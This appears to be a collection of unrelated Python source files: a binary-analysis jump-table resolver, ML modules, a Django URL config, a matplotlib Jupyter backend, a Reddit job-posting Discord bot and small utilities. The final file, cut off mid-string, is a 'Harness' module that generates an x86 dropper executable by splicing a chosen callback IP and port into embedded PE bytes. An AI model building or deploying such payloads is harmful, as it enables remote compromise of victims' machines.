o.CGC_ZERO_FILL_UNCONSTRAINED_MEMORY,
o.UNINITIALIZED_ACCESS_AWARENESS,
} | o.refs
)
return state
@staticmethod
def _parse_load_statement(load_stmt, state):
"""
Parse a memory load VEX statement and get the jump target addresses.
:param load_stmt: The VEX statement for loading the jump target addresses.
:param state: The SimState instance (in static mode).
:return: An abstract value (or a concrete value) representing the jump target addresses. Return None
if we fail to parse the statement.
"""
# The jump table address is stored in a tmp. In this case, we find the jump-target loading tmp.
load_addr_tmp = None
if isinstance(load_stmt, pyvex.IRStmt.WrTmp):
if type(load_stmt.data.addr) is pyvex.IRExpr.RdTmp:
load_addr_tmp = load_stmt.data.addr.tmp
elif type(load_stmt.data.addr) is pyvex.IRExpr.Const:
# It's directly loading from a constant address
# e.g.,
# ldr r0, =main+1
# blx r0
# It's not a jump table, but we resolve it anyway
jump_target_addr = load_stmt.data.addr.con.value
return state.solver.BVV(jump_target_addr, state.arch.bits)
elif isinstance(load_stmt, pyvex.IRStmt.LoadG):
if type(load_stmt.addr) is pyvex.IRExpr.RdTmp:
load_addr_tmp = load_stmt.addr.tmp
elif type(load_stmt.addr) is pyvex.IRExpr.Const:
# It's directly loading from a constant address
# e.g.,
# 4352c SUB R1, R11, #0x1000
# 43530 LDRHI R3, =loc_45450
# ...
# 43540 MOV PC, R3
#
# It's not a jump table, but we resolve it anyway
# Note that this block has two branches: One goes to 45450, the other one goes to whatever the original
# value of R3 is. Some intensive data-flow analysis is required in this case.
jump_target_addr = load_stmt.addr.con.value
return state.solver.BVV(jump_target_addr, state.arch.bits)
else:
raise TypeError("Unsupported address loading statement type %s." % type(load_stmt))
if state.scratch.temps[load_addr_tmp] is None:
# the tmp variable is not there... umm...
return None
jump_addr = state.scratch.temps[load_addr_tmp]
if isinstance(load_stmt, pyvex.IRStmt.LoadG):
# LoadG comes with a guard. We should apply this guard to the load expression
guard_tmp = load_stmt.guard.tmp
guard = state.scratch.temps[guard_tmp] != 0
try:
jump_addr = state.memory._apply_condition_to_symbolic_addr(jump_addr, guard)
except Exception: # pylint: disable=broad-except
l.exception("Error computing jump table address!")
return None
return jump_addr
def _is_jumptarget_legal(self, target):
try:
vex_block = self.project.factory.block(target, cross_insn_opt=True).vex_nostmt
except (AngrError, SimError):
return False
if vex_block.jumpkind == 'Ijk_NoDecode':
return False
if vex_block.size == 0:
return False
return True
|
py | 7dfaa2bd8cc534dc5388da53ab2342723a53378e | import torch
import torch.nn as nn
import torch.nn.functional as F
class Capsule(nn.Module):
def __init__(self, input_dim_capsule=1024, num_capsule=5, dim_capsule=5, routings=4):
super(Capsule, self).__init__()
self.num_capsule = num_capsule
self.dim_capsule = dim_capsule
self.routings = routings
self.activation = self.squash
self.W = nn.Parameter(
nn.init.xavier_normal_(torch.empty(1, input_dim_capsule, self.num_capsule * self.dim_capsule)))
def forward(self, x):
u_hat_vecs = torch.matmul(x, self.W)
batch_size = x.size(0)
input_num_capsule = x.size(1)
u_hat_vecs = u_hat_vecs.view((batch_size, input_num_capsule,
self.num_capsule, self.dim_capsule))
u_hat_vecs = u_hat_vecs.permute(
0, 2, 1, 3).contiguous() # (batch_size,num_capsule,input_num_capsule,dim_capsule)
with torch.no_grad():
b = torch.zeros_like(u_hat_vecs[:, :, :, 0])
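# dynamic routing by agreement: refine the coupling logits b for `routings` iterations;
# c is a softmax over the output capsules, and each output is the squashed, c-weighted sum
# of the prediction vectors u_hat_vecs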
for i in range(self.routings):
c = F.softmax(b, dim=1) # (batch_size,num_capsule,input_num_capsule)
outputs = self.activation(torch.sum(c.unsqueeze(-1) * u_hat_vecs, dim=2)) # bij,bijk->bik
if i < self.routings - 1:
b = (torch.sum(outputs.unsqueeze(2) * u_hat_vecs, dim=-1)) # bik,bijk->bij
return outputs # (batch_size, num_capsule, dim_capsule)
def squash(self, x, axis=-1):
s_squared_norm = (x ** 2).sum(axis, keepdim=True)
scale = torch.sqrt(s_squared_norm + 1e-7)
return x / scale
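# minimal usage sketch (the shapes below are an assumption for illustration, not taken from a caller in this repo):
# caps = Capsule(input_dim_capsule=1024, num_capsule=5, dim_capsule=5, routings=4)
# out = caps(torch.randn(8, 16, 1024)) # -> (8, 5, 5): one dim_capsule vector per output capsule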
|
py | 7dfaa2cde826f83896d112079f1fcc6707dc9c94 | from django.conf.urls import url
from . import views
urlpatterns = [
url(
r'show$',
views.get_students,
),
url(
r'query$',
views.query_students,
),
url(
r'checkID$',
views.check_studentID,
),
url(
r'add$',
views.add_student,
),
url(
r'update$',
views.update_student,
),
url(
r'delete$',
views.delete_student,
),
url(
r'deletebatch$',
views.delete_students,
),
url(
r'upload$',
views.upload,
),
]
|
py | 7dfaa303e71f3bbffb8f2f545f171cd58d3227ec | from utils import *
class FeatureMem:
def __init__(self, n_k, u_emb_dim, base_model, device):
self.n_k = n_k
self.base_model = base_model
self.p_memory = torch.randn(n_k, u_emb_dim, device=device).normal_() # on device
u_param, _, _ = base_model.get_weights()
self.u_memory = []
for i in range(n_k):
bias_list = []
for param in u_param:
bias_list.append(param.normal_(std=0.05))
self.u_memory.append(bias_list)
self.att_values = torch.zeros(n_k).to(device)
self.device = device
def read_head(self, p_u, alpha, train=True):
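# read: attend over the n_k profile memory rows with the user embedding p_u to assemble a
# personalized parameter initialization; during training the profile memory is refreshed
# with an alpha-weighted moving average of the attended profile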
# get personalized mu
att_model = Attention(self.n_k).to(self.device)
attention_values = att_model(p_u, self.p_memory).to(self.device) # pu on device
personalized_mu = get_mu(attention_values, self.u_memory, self.base_model, self.device)
# update mp
transposed_att = attention_values.reshape(self.n_k, 1)
product = torch.mm(transposed_att, p_u)
if train:
self.p_memory = alpha * product + (1-alpha) * self.p_memory
self.att_values = attention_values
return personalized_mu, attention_values
def write_head(self, u_grads, lr):
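# write: fold the user-specific gradients back into the n_k bias memories, weighted by the
# attention values cached by the preceding read_head call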
update_mu(self.att_values, self.u_memory, u_grads, lr)
class TaskMem:
def __init__(self, n_k, emb_dim, device):
self.n_k = n_k
self.memory_UI = torch.rand(n_k, emb_dim *2, emb_dim*2, device=device).normal_()
self.att_values = torch.zeros(n_k)
def read_head(self, att_values):
self.att_values = att_values
return get_mui(att_values, self.memory_UI, self.n_k)
def write_head(self, u_mui, lr):
update_values = update_mui(self.att_values, self.n_k, u_mui)
self.memory_UI = lr* update_values + (1-lr) * self.memory_UI
def cosine_similarity(input1, input2):
query_norm = torch.sqrt(torch.sum(input1**2+0.00001, 1))
doc_norm = torch.sqrt(torch.sum(input2**2+0.00001, 1))
prod = torch.sum(torch.mul(input1, input2), 1)
norm_prod = torch.mul(query_norm, doc_norm)
cos_sim_raw = torch.div(prod, norm_prod)
return cos_sim_raw
class Attention(torch.nn.Module):
def __init__(self, n_k, activation='relu'):
super(Attention, self).__init__()
self.n_k = n_k
self.fc_layer = torch.nn.Linear(self.n_k, self.n_k, activation_func(activation))
self.soft_max_layer = torch.nn.Softmax()
def forward(self, pu, mp):
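# score each memory row by cosine similarity with the (broadcast) user profile, then map the
# scores through a linear layer and a softmax to obtain the attention weights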
expanded_pu = pu.repeat(1, len(mp)).view(len(mp), -1) # shape, n_k, pu_dim
inputs = cosine_similarity(expanded_pu, mp)
fc_layers = self.fc_layer(inputs)
attention_values = self.soft_max_layer(fc_layers)
return attention_values
def get_mu(att_values, mu, model, device):
mu0,_,_ = model.get_zero_weights()
attention_values = att_values.reshape(len(mu),1)
for i in range(len(mu)):
for j in range(len(mu[i])):
mu0[j] += attention_values[i] * mu[i][j].to(device)
return mu0
def update_mu(att_values, mu, grads, lr):
att_values = att_values.reshape(len(mu), 1)
for i in range(len(mu)):
for j in range(len(mu[i])):
mu[i][j] = lr * att_values[i] * grads[j] + (1-lr) * mu[i][j]
def get_mui(att_values, mui, n_k):
attention_values = att_values.reshape(n_k, 1, 1)
attend_mui = torch.mul(attention_values, mui)
u_mui = attend_mui.sum(dim=0)
return u_mui
def update_mui(att_values, n_k, u_mui):
repeat_u_mui = u_mui.unsqueeze(0).repeat(n_k, 1, 1)
attention_tensor = att_values.reshape(n_k, 1, 1)
attend_u_mui = torch.mul(attention_tensor, repeat_u_mui)
return attend_u_mui
|
py | 7dfaa4ae1b01e19d3b01159593d7c6a4f761b5f7 | """Interactive figures in the Jupyter notebook"""
from base64 import b64encode
import json
import io
import six
import os
from uuid import uuid4 as uuid
from IPython.display import display, HTML
from ipywidgets import DOMWidget
from traitlets import Unicode, Bool, Float, List, Any
from matplotlib import rcParams
from matplotlib.figure import Figure
from matplotlib import is_interactive
from matplotlib.backends.backend_webagg_core import (FigureManagerWebAgg,
FigureCanvasWebAggCore,
NavigationToolbar2WebAgg,
TimerTornado)
from matplotlib.backend_bases import (ShowBase, NavigationToolbar2,
FigureCanvasBase)
class Show(ShowBase):
def __call__(self, block=None):
from matplotlib._pylab_helpers import Gcf
managers = Gcf.get_all_fig_managers()
if not managers:
return
interactive = is_interactive()
for manager in managers:
manager.show()
# plt.figure adds an event which puts the figure in focus
# in the activeQue. Disable this behaviour, as it results in
# figures being put as the active figure after they have been
# shown, even in non-interactive mode.
if hasattr(manager, '_cidgcf'):
manager.canvas.mpl_disconnect(manager._cidgcf)
if not interactive and manager in Gcf._activeQue:
Gcf._activeQue.remove(manager)
show = Show()
def draw_if_interactive():
import matplotlib._pylab_helpers as pylab_helpers
if is_interactive():
manager = pylab_helpers.Gcf.get_active()
if manager is not None:
manager.show()
def connection_info():
"""
Return a string showing the figure and connection status for
the backend. This is intended as a diagnostic tool, and not for general
use.
"""
from matplotlib._pylab_helpers import Gcf
result = []
for manager in Gcf.get_all_fig_managers():
fig = manager.canvas.figure
result.append('{0} - {1}'.format((fig.get_label() or
"Figure {0}".format(manager.num)),
manager.web_sockets))
if not is_interactive():
result.append('Figures pending show: {0}'.format(len(Gcf._activeQue)))
return '\n'.join(result)
# Note: Version 3.2 and 4.x icons
# http://fontawesome.io/3.2.1/icons/
# http://fontawesome.io/
# the `fa fa-xxx` part targets font-awesome 4, (IPython 3.x)
# the icon-xxx targets font awesome 3.21 (IPython 2.x)
_FONT_AWESOME_CLASSES = {
'home': 'fa fa-home icon-home',
'back': 'fa fa-arrow-left icon-arrow-left',
'forward': 'fa fa-arrow-right icon-arrow-right',
'zoom_to_rect': 'fa fa-square-o icon-check-empty',
'move': 'fa fa-arrows icon-move',
'download': 'fa fa-floppy-o icon-save',
'export': 'fa fa-file-picture-o icon-picture',
None: None
}
class NavigationIPy(NavigationToolbar2WebAgg):
# Use the standard toolbar items + download button
toolitems = [(text, tooltip_text,
_FONT_AWESOME_CLASSES[image_file], name_of_method)
for text, tooltip_text, image_file, name_of_method
in (NavigationToolbar2.toolitems +
(('Download', 'Download plot', 'download', 'download'),))
if image_file in _FONT_AWESOME_CLASSES]
def export(self):
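# render the current figure to an in-memory PNG and display it inline as a base64 data URI,
# scaled so it matches the on-screen widget size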
buf = io.BytesIO()
self.canvas.figure.savefig(buf, format='png', dpi='figure')
# Figure width in pixels
pwidth = self.canvas.figure.get_figwidth() * self.canvas.figure.get_dpi()
# Scale size to match widget on HiDPI monitors
width = pwidth / self.canvas._dpi_ratio
data = "<img src='data:image/png;base64,{0}' width={1}/>"
data = data.format(b64encode(buf.getvalue()).decode('utf-8'), width)
display(HTML(data))
here = os.path.dirname(__file__)
with open(os.path.join(here, 'static', 'package.json')) as fid:
js_version = json.load(fid)['version']
class FigureCanvasNbAgg(DOMWidget, FigureCanvasWebAggCore):
_model_module = Unicode('jupyter-matplotlib').tag(sync=True)
_model_module_version = Unicode('^%s' % js_version).tag(sync=True)
_model_name = Unicode('MPLCanvasModel').tag(sync=True)
_view_module = Unicode('jupyter-matplotlib').tag(sync=True)
_view_module_version = Unicode('^%s' % js_version).tag(sync=True)
_view_name = Unicode('MPLCanvasView').tag(sync=True)
_toolbar_items = List().tag(sync=True)
_closed = Bool(True)
_id = Unicode('').tag(sync=True)
# Must declare the superclass private members.
_png_is_old = Bool()
_force_full = Bool()
_current_image_mode = Unicode()
_dpi_ratio = Float(1.0)
_is_idle_drawing = Bool()
_is_saving = Bool()
_button = Any()
_key = Any()
_lastx = Any()
_lasty = Any()
_is_idle_drawing = Bool()
def __init__(self, figure, *args, **kwargs):
super(FigureCanvasWebAggCore, self).__init__(figure, *args, **kwargs)
super(DOMWidget, self).__init__(*args, **kwargs)
self._uid = uuid().hex
self.on_msg(self._handle_message)
def _handle_message(self, object, message, buffers):
# The 'supports_binary' message is relevant to the
# websocket itself. The other messages get passed along
# to matplotlib as-is.
# Every message has a "type" and a "figure_id".
message = json.loads(message)
if message['type'] == 'closing':
self._closed = True
elif message['type'] == 'supports_binary':
self.supports_binary = message['value']
elif message['type'] == 'initialized':
_, _, w, h = self.figure.bbox.bounds
self.manager.resize(w, h)
self.send_json('refresh')
else:
self.manager.handle_json(message)
def send_json(self, content):
self.send({'data': json.dumps(content)})
def send_binary(self, blob):
# The comm is ascii, so we always send the image in base64
# encoded data URL form.
data = b64encode(blob)
if six.PY3:
data = data.decode('ascii')
data_uri = "data:image/png;base64,{0}".format(data)
self.send({'data': data_uri})
def new_timer(self, *args, **kwargs):
return TimerTornado(*args, **kwargs)
def start_event_loop(self, timeout):
FigureCanvasBase.start_event_loop_default(self, timeout)
def stop_event_loop(self):
FigureCanvasBase.stop_event_loop_default(self)
class FigureManagerNbAgg(FigureManagerWebAgg):
ToolbarCls = NavigationIPy
def __init__(self, canvas, num):
FigureManagerWebAgg.__init__(self, canvas, num)
toolitems = []
for name, tooltip, image, method in self.ToolbarCls.toolitems:
if name is None:
toolitems.append(['', '', '', ''])
else:
toolitems.append([name, tooltip, image, method])
canvas._toolbar_items = toolitems
self.web_sockets = [self.canvas]
def show(self):
if self.canvas._closed:
self.canvas._closed = False
display(self.canvas)
else:
self.canvas.draw_idle()
def destroy(self):
self.canvas.close()
def new_figure_manager(num, *args, **kwargs):
"""
Create a new figure manager instance
"""
FigureClass = kwargs.pop('FigureClass', Figure)
thisFig = FigureClass(*args, **kwargs)
return new_figure_manager_given_figure(num, thisFig)
def new_figure_manager_given_figure(num, figure):
"""
Create a new figure manager instance for the given figure.
"""
from matplotlib._pylab_helpers import Gcf
def closer(event):
Gcf.destroy(num)
canvas = FigureCanvasNbAgg(figure)
if 'nbagg.transparent' in set(rcParams.keys()) and rcParams['nbagg.transparent']:
figure.patch.set_alpha(0)
manager = FigureManagerNbAgg(canvas, num)
if is_interactive():
manager.show()
figure.canvas.draw_idle()
canvas.mpl_connect('close_event', closer)
return manager
|
py | 7dfaa4d9c551dba6aff27bacfe2567c6faffef06 | #!/usr/bin/env python3
import json
import logging
from pprint import pformat
from OTXv2 import OTXv2
from OTXv2 import IndicatorTypes
from sys import path
from os.path import dirname as dir
path.append(dir(path[0]))
import otrs_functions
from config import LoadConfig
def Main(IPList, TicketID):
conf = LoadConfig.Load()
otx = OTXv2(conf["api_keys"]["AlienVaultAPI"])
for IP in IPList:
logging.info("[AlienVault] OTX Searching %s" % IP)
result = pformat(otx.get_indicator_details_full(IndicatorTypes.IPv4, IP))
otrs_functions.UpdateTicket("","AlienVault OTX - %s Results" % IP, result, TicketID)
|
py | 7dfaa60739b569f0af53886af9d552e9f3ade4bb | #! usr/bin/env python3
import asyncio
import logging
import pprint
import time
from datetime import datetime
import asyncpraw
import asyncprawcore
import discord
from discord.ext import commands, tasks
import commands as bot_commands
from core.config import (
DEXTER_ADMIN_ROLE_ID,
DEXTER_CHANNEL_LOGS_ID,
CLIENT_ID,
CLIENT_SECRET,
DATABASE_NAME,
DEXTER_DISCORD_GUILD_ID,
DEXTER_ID,
DISCORD_TOKEN,
REDDIT_PASSWORD,
REDDIT_USER,
)
from db.mongodb import get_database
from db.mongodb_init import close_mongo_connection, connect_to_mongo
pp = pprint.PrettyPrinter(indent=4)
logFormatter = logging.Formatter(
"%(asctime)s [%(threadName)-12.12s] [%(levelname)-5.5s] %(message)s"
)
rootLogger = logging.getLogger()
consoleHandler = logging.StreamHandler()
consoleHandler.setFormatter(logFormatter)
rootLogger.addHandler(consoleHandler)
rootLogger.setLevel(logging.INFO)
illegal_char_list = [".", ",", "!", "?", "[", "]"]
reddit = asyncpraw.Reddit(
client_id=CLIENT_ID,
client_secret=CLIENT_SECRET,
user_agent="Reddit Job Finder Discord Bot",
username=REDDIT_USER,
password=REDDIT_PASSWORD,
)
client = commands.Bot(command_prefix="$sudo", help_command=None)
@client.event
async def on_ready():
connect_to_mongo()
print(f"{client.user} is connected to the following guild:\n")
for guild in client.guilds:
print(f"{guild.name}(id: {guild.id})")
def build_discord_embed_message(submission, keyword):
title = submission.title
if len(title) > 256:
title = submission.title[:252] + "..."
description = submission.selftext
if len(description) > 2048:
description = submission.selftext[:2044] + "..."
embed = discord.Embed(
title=f"{title}",
color=discord.Colour(0x82DE09),
url=f"https://www.reddit.com{submission.permalink}",
description=f"{description}",
)
embed.set_author(name=f"{submission.author.name}")
embed.set_footer(
text=f"Subreddit {submission.subreddit_name_prefixed} "
f'| {time.strftime("%a %b %d, %Y at %H:%M:%S", time.gmtime(submission.created_utc))}'
)
try:
embed.set_thumbnail(url=f'{submission.preview["images"][0]["source"]["url"]}')
except AttributeError:
pass
embed.add_field(name="#️⃣", value=f"{keyword.capitalize()}", inline=False)
embed.add_field(name="👍", value=f"{submission.ups}", inline=True)
embed.add_field(name="👎", value=f"{submission.downs}", inline=True)
embed.add_field(name="💬", value=f"{submission.num_comments}", inline=True)
return embed
def build_discord_embed_logs(e):
embed = discord.Embed(
title=f"🚑 {e}",
color=discord.Colour(0xE74C3C),
description=f"{e.__doc__}",
)
return embed
async def send_discord_message(submission, keyword, channel_id):
channel = client.get_channel(channel_id)
await channel.send(embed=build_discord_embed_message(submission, keyword))
# print(f'Link : https://www.reddit.com{submission.permalink}')
async def mention_admin_in_case_of_exceptions(e):
channel = client.get_channel(DEXTER_CHANNEL_LOGS_ID)
guild = client.get_guild(id=DEXTER_DISCORD_GUILD_ID)
admin = discord.utils.get(guild.roles, id=int(DEXTER_ADMIN_ROLE_ID))
await channel.send(
f"{admin.mention} I'm sick, please help me!",
embed=build_discord_embed_logs(e),
)
async def search_for_illegal_words_and_trigger_message_sending(
word, keyword_job, submission, sent_submission_id_list, conn, channel_id
):
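# strip punctuation from the candidate word, compare it case-insensitively with the keyword,
# and on a first-time match send the embed and persist the submission id so it is never re-sent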
for illegal_char in illegal_char_list:
word = word.replace(illegal_char, "")
if (
word.lower() == keyword_job.lower()
and submission.id not in sent_submission_id_list
):
await send_discord_message(submission, keyword_job, channel_id)
sent_submission_id_list.append(submission.id)
submission_json = {
"submission_permalink": submission.permalink,
"submission_id": submission.id,
"created_at": datetime.now(),
}
await conn[DATABASE_NAME]["submission"].insert_one(submission_json)
@tasks.loop(seconds=10.0)
async def search_subreddits():
await client.wait_until_ready()
connect_to_mongo()
conn = get_database()
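# for every guild with a configured destination channel, scan the newest posts of each tracked
# subreddit for a "hiring" flair and the guild's job keywords, skipping submissions already
# recorded in the "submission" collection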
for guild in client.guilds:
db_channel = await conn[DATABASE_NAME]["channel"].find_one(
{"guild_id": guild.id}
)
if db_channel is None or db_channel["channel_id"] is None:
print("Pass, channel not set")
else:
channel_id = int(db_channel["channel_id"])
subreddit_raw_list = conn[DATABASE_NAME]["subreddit"].find(
{"guild_id": guild.id}
)
job_keyword_raw_list = conn[DATABASE_NAME]["job_keyword"].find(
{"guild_id": guild.id}
)
job_keyword_list = []
sent_submission_raw_list = conn[DATABASE_NAME]["submission"].find()
sent_submission_id_list = []
async for submission in sent_submission_raw_list:
sent_submission_id_list.append(submission["submission_id"])
async for job_keyword_obj in job_keyword_raw_list:
job_keyword_list.append(job_keyword_obj)
async for subreddit_obj in subreddit_raw_list:
try:
subreddit = await reddit.subreddit(subreddit_obj["subreddit"])
async for submission in subreddit.new(limit=10):
for job_keyword_obj in job_keyword_list:
job_keyword = job_keyword_obj["job_keyword"]
if submission.link_flair_text:
if (
"hiring" in submission.link_flair_text.lower()
and submission.id not in sent_submission_id_list
):
for word in submission.permalink.replace(
"/", "_"
).split("_"):
await search_for_illegal_words_and_trigger_message_sending(
word,
job_keyword,
submission,
sent_submission_id_list,
conn,
channel_id,
)
for word in submission.selftext.split(" "):
await search_for_illegal_words_and_trigger_message_sending(
word,
job_keyword,
submission,
sent_submission_id_list,
conn,
channel_id,
)
except asyncprawcore.exceptions.ServerError as e:
if not bot_commands.SNOOZE:
await mention_admin_in_case_of_exceptions(e)
await asyncio.sleep(10)
except Exception as e:
if not bot_commands.SNOOZE:
await mention_admin_in_case_of_exceptions(e)
await asyncio.sleep(10)
@commands.command(name="_exit")
async def graceful_exit(ctx):
if ctx.message.author.id == DEXTER_ID:
close_mongo_connection()
await client.close()
else:
await ctx.send(
"```Why the fuck are you trying to kill me?\n"
"Only Dexter#4335 is allowed to do this.\n"
"If you have any problem please, contact him!```"
)
client.add_command(bot_commands.ping)
client.add_command(bot_commands.snooze)
client.add_command(bot_commands.custom_help)
client.add_command(graceful_exit)
client.add_command(bot_commands.subreddit)
client.add_command(bot_commands.job_keyword)
client.add_command(bot_commands.channel)
search_subreddits.start()
client.run(DISCORD_TOKEN)
|
py | 7dfaa611c1a3adf4dbe61ae832f4774c9a48eff6 | '''
The MIT License(MIT)
Copyright(c) 2016 Copyleaks LTD (https://copyleaks.com)
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
import unittest
from copyleaks.copyleakscloud import CopyleaksCloud
from copyleaks.models.processoptions import ProcessOptions
from copyleaks.models.eocrlanguage import eOcrLanguage
class CreateProcessTests(unittest.TestCase):
def setUp(self):
self.cloud = CopyleaksCloud('<YOUR_EMAIL_HERE>', '<YOUR_API_KEY_HERE>')
self.options = ProcessOptions()
self.options.setSandboxMode(True)
pass
def tearDown(self):
pass
def testCreateByUrl(self):
proc = self.cloud.createByUrl('http://python.org', self.options)
self.assertGreater(len(proc.getPID()), 0)
pass
def testCreateByFile(self):
proc = self.cloud.createByFile('files/lorem.txt', self.options)
self.assertGreater(len(proc.getPID()), 0)
pass
def testCreateByOcr(self):
proc = self.cloud.createByOcr('files/lorem.jpg', eOcrLanguage.English, self.options)
self.assertGreater(len(proc.getPID()), 0)
pass
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testCreateByFile']
unittest.main() |
py | 7dfaa69589fa3081d9ddaa267eda92a51522293f | # Jacob Mannix [8-18-20]
# Import Dependencies
from watchdog.observers import Observer
import time
from watchdog.events import FileSystemEventHandler
import os
import json
class MyHandler(FileSystemEventHandler):
i = 0
def on_modified(self, event):
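# whenever the watched folder changes, move every file it contains into the destination
# folder, renaming each to the next unused "new_file_<i>.txt"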
new_name = "new_file_" + str(self.i) + ".txt"
for filename in os.listdir(folder_to_track):
file_exists = os.path.isfile(folder_destination + "/" + new_name)
while file_exists:
self.i += 1
new_name = "new_file_" + str(self.i) + ".txt"
file_exists = os.path.isfile(folder_destination + "/" + new_name)
src = folder_to_track + "/" + filename
new_destination = folder_destination + "/" + new_name
os.rename(src, new_destination)
folder_to_track = '/Users/jacobmannix/Desktop/Folder1'
folder_destination = '/Users/jacobmannix/Desktop/Folder2'
event_handler = MyHandler()
observer = Observer()
observer.schedule(event_handler, folder_to_track, recursive = True)
observer.start()
try:
while True:
time.sleep(10)
except KeyboardInterrupt:
observer.stop()
observer.join()
|
py | 7dfaa7fe2e9797579a093b462824a50347205b49 | from unittest import TestCase
from mock import Mock
from parameterized import parameterized
from grafy.api.transmitters import Point
class PointTest(TestCase):
@parameterized.expand([
(1, 2),
(3, 4),
(-5, -6),
(8, 20),
])
def test_fabricRandomPoint(self, circleRadius, weight):
p = Point.fabricRandomPoint(20, 10)
print(p)
expectedX = 20
expectedY = 10
self.assertEqual(p.x, expectedX)
self.assertEqual(p.y, expectedY)
class CircleCalculatorTest(TestCase):
def setUp(self):
self.point = Mock() #type: Point
self.point.x = 5
self.point.y = 20
def test_checkCoordinatesOfPointInCircle_shouldPass(self):
pass
def test_checkPointIsInCircle_shouldPass(self):
pass
def test_checkEdgeBetweenPointsExists_(self):
pass |
py | 7dfaa8a2825cbb831bef5a4a3f2e33be8d3ee909 | from blake3 import blake3
import ecdsa
import json
import hashlib
from datetime import datetime
# msg = bytes("hello world", "utf-8")
# print("The hash of 'hello world' is", blake3(msg).hexdigest())
# print("print keys here")
# def generate_keys():
# private_key = ecdsa.SigningKey.generate(curve=ecdsa.SECP256k1)
# public_key = private_key.get_verifying_key()
# return public_key.to_string().hex(), private_key.to_string().hex()
# public_key, private_key = generate_keys()
# print("public key", public_key)
# print("\n")
# print("private key", private_key)
# def calculateHash(sender, receiver, amt, time):
# hashString = sender + receiver + str(amt) + str(time)
# hashEncoded = json.dumps(hashString, sort_keys=True).encode()
# return blake3(hashEncoded).hexdigest()
# time = datetime.now().strftime("%m/%d/%Y, %H:%M:%S")
# sender = "me"
# receiver = "you"
# amt = 10
# print(calculateHash(sender, receiver, amt, time))
from hashlib import sha256
message = b"message"
public_key = '98cedbb266d9fc38e41a169362708e0509e06b3040a5dfff6e08196f8d9e49cebfb4f4cb12aa7ac34b19f3b29a17f4e5464873f151fd699c2524e0b7843eb383'
sig = '740894121e1c7f33b174153a7349f6899d0a1d2730e9cc59f674921d8aef73532f63edb9c5dba4877074a937448a37c5c485e0d53419297967e95e9b1bef630d'
vk = ecdsa.VerifyingKey.from_string(bytes.fromhex(public_key), curve=ecdsa.SECP256k1, hashfunc=sha256) # the default is sha1
print(vk)
print("\n")
print(vk.verify(bytes.fromhex(sig), message) )
|
py | 7dfaa94ac2a5e4f1844d37cc8b9ea7ce76f4437c | from .casia import CASIA_Face
|
py | 7dfaa98ee785b52dae6ad41f9332352ab5f3c553 | # -*- coding: utf-8 -*-
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath("../../src"))
# -- Project information -----------------------------------------------------
project = "Poke-env"
copyright = "2019, Haris Sahovic"
author = "Haris Sahovic"
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ["sphinx.ext.autodoc"]
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = []
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "sphinx_rtd_theme"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = []
master_doc = "index"
|
py | 7dfaabf4cdc0d4b57c4b1d90f625506c99b287fb |
'''
Harness Toolset
Copyright (c) 2014 Rich Kelley, RK5DEVMAIL[A T]gmail[D O T]com
'''
from harness.core import module
class Module(module.ModuleFrame):
about = {
'name': 'Harness_x86',
'info': 'Generate Dropper (x86) payload (exe)',
'author': 'Rich',
'contact': '@RGKelley5',
'version': '1.0'
}
def __init__(self):
module.ModuleFrame.__init__(self, self.about)
self.add_option('IP', "0.0.0.0", "str")
self.add_option('PORT', "80", "int")
def run_module(self):
PORT = self.options.PORT
IP = self.options.IP
ip_hex = ["{:02x}".format(i) for i in map(int, IP.split("."))]
_port = format(PORT, "04x")
port_hex = [_port[i:i+2] for i in range(0, len(_port), 2)]
port_hex.reverse()
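# the configured IP becomes four hex octets and the port a little-endian 16-bit hex pair;
# both are spliced into the embedded PE image (raw_code) below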
raw_code = "4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000504500004c0103009fb304560000000000000000e00002010b010b00004c00000006000000000000ee6a000000200000008000000000400000200000000200000400000000000000040000000000000000c000000002000000000000020040850000100000100000000010000010000000000000100000000000000000000000986a00005300000000800000d80200000000000000000000000000000000000000a000000c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002e74657874000000f44a000000200000004c000000020000000000000000000000000000200000602e72737263000000d80200000080000000040000004e0000000000000000000000000000400000402e72656c6f6300000c00000000a0000000020000005200000000000000000000000000004000004200000000000000000000000000000000d06a000000000000480000000200050008370000903300000300000006000006000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
raw_code += "".join(ip_hex) # ip
raw_code += "13300400cb0000000100001102177d0100000402177d05000004021a8d3400000125d028000004281100000a7d06000004021a8d340000010a067d070000040220"
